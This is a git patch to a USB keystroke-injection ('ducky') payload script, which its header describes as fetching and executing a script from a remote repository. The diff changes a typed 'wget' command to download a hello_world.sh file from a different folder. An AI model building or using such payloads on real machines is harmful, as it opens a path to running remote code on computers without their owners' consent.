From 8fa0fed2f4db6a4a61be9a46605670f39cd99121 Mon Sep 17 00:00:00 2001 From: jasmine Date: Fri, 3 Jan 2025 16:06:14 +0800 Subject: [PATCH] fix path --- payload.dd | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payload.dd b/payload.dd index 1cad813..af2cc2a 100644 --- a/payload.dd +++ b/payload.dd @@ -4,7 +4,7 @@ REM DESCRIPTION Fetch and execute a script from remote repository REM VERSION 1.0 DELAY 200 -STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bash/hello_world.sh +STRING wget -q https://git.sajenim.dev/jasmine/ducky-payloads/raw/branch/master/bin/hello_world.sh ENTER DELAY 200